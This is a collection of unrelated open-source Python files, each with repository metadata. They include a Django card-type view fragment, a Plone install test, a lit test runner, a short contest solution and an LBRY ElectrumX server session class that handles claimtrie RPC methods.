card_type = CardType.objects.filter(card_type=kwargs.pop('slug')).first()
if card_type:
response = {
'id': card_type.id,
'card_type': card_type.card_type,
'name': card_type.alias}
else:
response = None
return HttpResponse(json.dumps(response))
|
FUNSEPA/fsp-paypal
|
pagos/views.py
|
Python
|
mit
| 1,361
|
# -*- coding: utf-8 -*-
"""Setup/installation tests for this package."""
from ade25.assetmanager.testing import IntegrationTestCase
from plone import api
class TestInstall(IntegrationTestCase):
"""Test installation of ade25.assetmanager into Plone."""
def setUp(self):
"""Custom shared utility setup for tests."""
self.portal = self.layer['portal']
self.installer = api.portal.get_tool('portal_quickinstaller')
def test_product_installed(self):
"""Test if ade25.assetmanager is installed with portal_quickinstaller."""
self.assertTrue(self.installer.isProductInstalled('ade25.assetmanager'))
def test_uninstall(self):
"""Test if ade25.assetmanager is cleanly uninstalled."""
self.installer.uninstallProducts(['ade25.assetmanager'])
self.assertFalse(self.installer.isProductInstalled('ade25.assetmanager'))
# browserlayer.xml
def test_browserlayer(self):
"""Test that IAde25AssetmanagerLayer is registered."""
from ade25.assetmanager.interfaces import IAde25AssetmanagerLayer
from plone.browserlayer import utils
        self.assertTrue(IAde25AssetmanagerLayer in utils.registered_layers())
|
ade25/ade25.assetmanager
|
ade25/assetmanager/tests/test_setup.py
|
Python
|
mit
| 1,209
|
#!/usr/bin/env python
# https://medium.com/@mshockwave/using-llvm-lit-out-of-tree-5cddada85a78
# To run lit-based test suite:
# cd xyz/qmlcore/test && ./lit.py -va .
from lit.main import main
import os
if __name__ == '__main__':
if not os.path.exists(".cache/core.Item"):
print("Note that first run may take quite a while .cache/core.* is populated...")
main()
|
pureqml/qmlcore
|
test/lit.py
|
Python
|
mit
| 381
|
s = input().rstrip()
print(s[:4],s[4:])
|
utgw/programming-contest
|
codefestival/2016/qualA/a.py
|
Python
|
mit
| 40
|
import math
import unicodedata as uda
from binascii import unhexlify, hexlify
from torba.rpc.jsonrpc import RPCError
from torba.server.hash import hash_to_hex_str
from torba.server.session import ElectrumX
from torba.server import util
from lbry.schema.result import Outputs
from lbry.schema.url import URL
from lbry.wallet.server.block_processor import LBRYBlockProcessor
from lbry.wallet.server.db import LBRYDB
class LBRYElectrumX(ElectrumX):
PROTOCOL_MIN = (0, 0) # temporary, for supporting 0.10 protocol
max_errors = math.inf # don't disconnect people for errors! let them happen...
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# fixme: this is a rebase hack, we need to go through ChainState instead later
self.daemon = self.session_mgr.daemon
self.bp: LBRYBlockProcessor = self.session_mgr.bp
self.db: LBRYDB = self.bp.db
def set_request_handlers(self, ptuple):
super().set_request_handlers(ptuple)
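        # extend the stock ElectrumX handlers with the LBRY claimtrie RPC methods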
handlers = {
'blockchain.transaction.get_height': self.transaction_get_height,
'blockchain.claimtrie.search': self.claimtrie_search,
'blockchain.claimtrie.resolve': self.claimtrie_resolve,
'blockchain.claimtrie.getclaimbyid': self.claimtrie_getclaimbyid,
'blockchain.claimtrie.getclaimsforname': self.claimtrie_getclaimsforname,
'blockchain.claimtrie.getclaimsbyids': self.claimtrie_getclaimsbyids,
'blockchain.claimtrie.getvalue': self.claimtrie_getvalue,
'blockchain.claimtrie.getnthclaimforname': self.claimtrie_getnthclaimforname,
'blockchain.claimtrie.getclaimsintx': self.claimtrie_getclaimsintx,
'blockchain.claimtrie.getclaimssignedby': self.claimtrie_getclaimssignedby,
'blockchain.claimtrie.getclaimssignedbynthtoname': self.claimtrie_getclaimssignedbynthtoname,
'blockchain.claimtrie.getvalueforuri': self.claimtrie_getvalueforuri,
'blockchain.claimtrie.getvaluesforuris': self.claimtrie_getvalueforuris,
'blockchain.claimtrie.getclaimssignedbyid': self.claimtrie_getclaimssignedbyid,
'blockchain.block.get_server_height': self.get_server_height,
}
self.request_handlers.update(handlers)
async def claimtrie_search(self, **kwargs):
if 'claim_id' in kwargs:
self.assert_claim_id(kwargs['claim_id'])
return Outputs.to_base64(*self.db.sql.search(kwargs))
async def claimtrie_resolve(self, *urls):
return Outputs.to_base64(*self.db.sql.resolve(urls))
async def get_server_height(self):
return self.bp.height
async def transaction_get_height(self, tx_hash):
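        # returns the block height for a confirmed transaction, -1 for an
        # unconfirmed (mempool) one, and None when the transaction is unknown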
self.assert_tx_hash(tx_hash)
transaction_info = await self.daemon.getrawtransaction(tx_hash, True)
if transaction_info and 'hex' in transaction_info and 'confirmations' in transaction_info:
# an unconfirmed transaction from lbrycrdd will not have a 'confirmations' field
return (self.db.db_height - transaction_info['confirmations']) + 1
elif transaction_info and 'hex' in transaction_info:
return -1
return None
async def claimtrie_getclaimssignedby(self, name):
winning_claim = await self.daemon.getvalueforname(name)
if winning_claim:
return await self.claimtrie_getclaimssignedbyid(winning_claim['claimId'])
async def claimtrie_getclaimssignedbyid(self, certificate_id):
claim_ids = self.get_claim_ids_signed_by(certificate_id)
return await self.batched_formatted_claims_from_daemon(claim_ids)
def claimtrie_getclaimssignedbyidminimal(self, certificate_id):
claim_ids = self.get_claim_ids_signed_by(certificate_id)
ret = []
for claim_id in claim_ids:
raw_claim_id = unhexlify(claim_id)[::-1]
info = self.db.get_claim_info(raw_claim_id)
if info:
ret.append({
'claim_id': claim_id,
'height': info.height,
'name': info.name.decode()
})
return ret
def get_claim_ids_signed_by(self, certificate_id):
raw_certificate_id = unhexlify(certificate_id)[::-1]
raw_claim_ids = self.db.get_signed_claim_ids_by_cert_id(raw_certificate_id)
return list(map(hash_to_hex_str, raw_claim_ids))
async def claimtrie_getclaimssignedbynthtoname(self, name, n):
        claim = await self.claimtrie_getnthclaimforname(name, n)
if claim and 'claim_id' in claim:
return await self.claimtrie_getclaimssignedbyid(hash_to_hex_str(claim['claim_id']))
async def claimtrie_getclaimsintx(self, txid):
# TODO: this needs further discussion.
# Code on lbryum-server is wrong and we need to gather what we clearly expect from this command
claim_ids = [claim['claimId'] for claim in (await self.daemon.getclaimsfortx(txid)) if 'claimId' in claim]
return await self.batched_formatted_claims_from_daemon(claim_ids)
async def claimtrie_getvalue(self, name, block_hash=None):
proof = await self.daemon.getnameproof(name, block_hash)
result = {'proof': proof, 'supports': []}
if proof_has_winning_claim(proof):
tx_hash, nout = proof['txhash'], int(proof['nOut'])
transaction_info = await self.daemon.getrawtransaction(tx_hash, True)
result['transaction'] = transaction_info['hex'] # should have never included this (or the call to get it)
raw_claim_id = self.db.get_claim_id_from_outpoint(unhexlify(tx_hash)[::-1], nout)
claim_id = hexlify(raw_claim_id[::-1]).decode()
claim = await self.claimtrie_getclaimbyid(claim_id)
result.update(claim)
return result
async def claimtrie_getnthclaimforname(self, name, n):
n = int(n)
result = await self.claimtrie_getclaimsforname(name)
if 'claims' in result and len(result['claims']) > n >= 0:
# TODO: revist this after lbrycrd_#209 to see if we can sort by claim_sequence at this point
result['claims'].sort(key=lambda c: (int(c['height']), int(c['nout'])))
result['claims'][n]['claim_sequence'] = n
return result['claims'][n]
async def claimtrie_getpartialmatch(self, name, part):
result = await self.claimtrie_getclaimsforname(name)
if 'claims' in result:
            return next(filter(lambda x: x['claim_id'].startswith(part), result['claims']), None)
async def claimtrie_getclaimsforname(self, name):
claims = await self.daemon.getclaimsforname(name)
if claims:
claims['claims'] = [self.format_claim_from_daemon(claim, name) for claim in claims['claims']]
claims['supports_without_claims'] = [] # fixme temporary
del claims['supports without claims']
claims['last_takeover_height'] = claims['nLastTakeoverHeight']
del claims['nLastTakeoverHeight']
return claims
return {}
async def batched_formatted_claims_from_daemon(self, claim_ids):
claims = await self.daemon.getclaimsbyids(claim_ids)
result = []
for claim in claims:
if claim and claim.get('value'):
result.append(self.format_claim_from_daemon(claim))
return result
def format_claim_from_daemon(self, claim, name=None):
"""Changes the returned claim data to the format expected by lbry and adds missing fields."""
if not claim:
return {}
# this ISO-8859 nonsense stems from a nasty form of encoding extended characters in lbrycrd
# it will be fixed after the lbrycrd upstream merge to v17 is done
# it originated as a fear of terminals not supporting unicode. alas, they all do
if 'name' in claim:
name = claim['name'].encode('ISO-8859-1').decode()
info = self.db.sql.get_claims(claim_id=claim['claimId'])
if not info:
# raise RPCError("Lbrycrd has {} but not lbryumx, please submit a bug report.".format(claim_id))
return {}
address = info.address.decode()
# fixme: temporary
#supports = self.format_supports_from_daemon(claim.get('supports', []))
supports = []
amount = get_from_possible_keys(claim, 'amount', 'nAmount')
height = get_from_possible_keys(claim, 'height', 'nHeight')
effective_amount = get_from_possible_keys(claim, 'effective amount', 'nEffectiveAmount')
valid_at_height = get_from_possible_keys(claim, 'valid at height', 'nValidAtHeight')
result = {
"name": name,
"claim_id": claim['claimId'],
"txid": claim['txid'],
"nout": claim['n'],
"amount": amount,
"depth": self.db.db_height - height + 1,
"height": height,
"value": hexlify(claim['value'].encode('ISO-8859-1')).decode(),
"address": address, # from index
"supports": supports,
"effective_amount": effective_amount,
"valid_at_height": valid_at_height
}
if 'claim_sequence' in claim:
# TODO: ensure that lbrycrd #209 fills in this value
result['claim_sequence'] = claim['claim_sequence']
else:
result['claim_sequence'] = -1
if 'normalized_name' in claim:
result['normalized_name'] = claim['normalized_name'].encode('ISO-8859-1').decode()
return result
def format_supports_from_daemon(self, supports):
return [[support['txid'], support['n'], get_from_possible_keys(support, 'amount', 'nAmount')] for
support in supports]
async def claimtrie_getclaimbyid(self, claim_id):
self.assert_claim_id(claim_id)
claim = await self.daemon.getclaimbyid(claim_id)
return self.format_claim_from_daemon(claim)
async def claimtrie_getclaimsbyids(self, *claim_ids):
claims = await self.batched_formatted_claims_from_daemon(claim_ids)
return dict(zip(claim_ids, claims))
def assert_tx_hash(self, value):
'''Raise an RPCError if the value is not a valid transaction
hash.'''
try:
if len(util.hex_to_bytes(value)) == 32:
return
except Exception:
pass
raise RPCError(1, f'{value} should be a transaction hash')
def assert_claim_id(self, value):
'''Raise an RPCError if the value is not a valid claim id
hash.'''
try:
if len(util.hex_to_bytes(value)) == 20:
return
except Exception:
pass
raise RPCError(1, f'{value} should be a claim id hash')
def normalize_name(self, name):
# this is designed to match lbrycrd; change it here if it changes there
return uda.normalize('NFD', name).casefold()
def claim_matches_name(self, claim, name):
if not name:
return False
if 'normalized_name' in claim:
return self.normalize_name(name) == claim['normalized_name']
return name == claim['name']
async def claimtrie_getvalueforuri(self, block_hash, uri, known_certificates=None):
# TODO: this thing is huge, refactor
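        # resolution_type markers: a URL part may resolve via an explicit
        # claim id, via a claim sequence number, or via the winning claim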
CLAIM_ID = "claim_id"
WINNING = "winning"
SEQUENCE = "sequence"
try:
parsed_uri = URL.parse(uri)
except ValueError as err:
return {'error': err.args[0]}
result = {}
if parsed_uri.has_channel:
certificate = None
# TODO: this is also done on the else, refactor
if parsed_uri.channel.claim_id:
if len(parsed_uri.channel.claim_id) < 40:
                    certificate_info = await self.claimtrie_getpartialmatch(
                        parsed_uri.channel.name, parsed_uri.channel.claim_id)
else:
certificate_info = await self.claimtrie_getclaimbyid(parsed_uri.channel.claim_id)
if certificate_info and self.claim_matches_name(certificate_info, parsed_uri.channel.name):
certificate = {'resolution_type': CLAIM_ID, 'result': certificate_info}
elif parsed_uri.claim_sequence:
certificate_info = await self.claimtrie_getnthclaimforname(parsed_uri.name, parsed_uri.claim_sequence)
if certificate_info:
certificate = {'resolution_type': SEQUENCE, 'result': certificate_info}
else:
certificate_info = await self.claimtrie_getvalue(parsed_uri.name, block_hash)
if certificate_info:
certificate = {'resolution_type': WINNING, 'result': certificate_info}
if certificate and 'claim_id' not in certificate['result']:
return result
if certificate:
result['certificate'] = certificate
channel_id = certificate['result']['claim_id']
claims_in_channel = self.claimtrie_getclaimssignedbyidminimal(channel_id)
if not parsed_uri.path:
result['unverified_claims_in_channel'] = {claim['claim_id']: (claim['name'], claim['height'])
for claim in claims_in_channel}
else:
# making an assumption that there aren't case conflicts on an existing channel
norm_path = self.normalize_name(parsed_uri.path)
result['unverified_claims_for_name'] = {claim['claim_id']: (claim['name'], claim['height'])
for claim in claims_in_channel
if self.normalize_name(claim['name']) == norm_path}
else:
claim = None
if parsed_uri.claim_id:
if len(parsed_uri.claim_id) < 40:
                    claim_info = await self.claimtrie_getpartialmatch(parsed_uri.name, parsed_uri.claim_id)
else:
claim_info = await self.claimtrie_getclaimbyid(parsed_uri.claim_id)
if claim_info and self.claim_matches_name(claim_info, parsed_uri.name):
claim = {'resolution_type': CLAIM_ID, 'result': claim_info}
elif parsed_uri.claim_sequence:
claim_info = await self.claimtrie_getnthclaimforname(parsed_uri.name, parsed_uri.claim_sequence)
if claim_info:
claim = {'resolution_type': SEQUENCE, 'result': claim_info}
else:
claim_info = await self.claimtrie_getvalue(parsed_uri.name, block_hash)
if claim_info:
claim = {'resolution_type': WINNING, 'result': claim_info}
if (claim and
# is not an unclaimed winning name
(claim['resolution_type'] != WINNING or proof_has_winning_claim(claim['result']['proof']))):
raw_claim_id = unhexlify(claim['result']['claim_id'])[::-1]
raw_certificate_id = self.db.get_claim_info(raw_claim_id).cert_id
if raw_certificate_id:
certificate_id = hash_to_hex_str(raw_certificate_id)
certificate = await self.claimtrie_getclaimbyid(certificate_id)
if certificate:
certificate = {'resolution_type': CLAIM_ID,
'result': certificate}
result['certificate'] = certificate
result['claim'] = claim
return result
async def claimtrie_getvalueforuris(self, block_hash, *uris):
MAX_BATCH_URIS = 500
if len(uris) > MAX_BATCH_URIS:
raise Exception("Exceeds max batch uris of {}".format(MAX_BATCH_URIS))
return {uri: await self.claimtrie_getvalueforuri(block_hash, uri) for uri in uris}
# TODO: get it all concurrently when lbrycrd pending changes goes into a stable release
#async def getvalue(uri):
# value = await self.claimtrie_getvalueforuri(block_hash, uri)
# return uri, value,
#return dict([await asyncio.gather(*tuple(getvalue(uri) for uri in uris))][0])
def proof_has_winning_claim(proof):
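    # a name proof includes 'txhash' and 'nOut' only when some claim
    # currently wins the name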
return {'txhash', 'nOut'}.issubset(proof.keys())
def get_from_possible_keys(dictionary, *keys):
for key in keys:
if key in dictionary:
return dictionary[key]
|
lbryio/lbry
|
lbry/lbry/wallet/server/session.py
|
Python
|
mit
| 16,685
|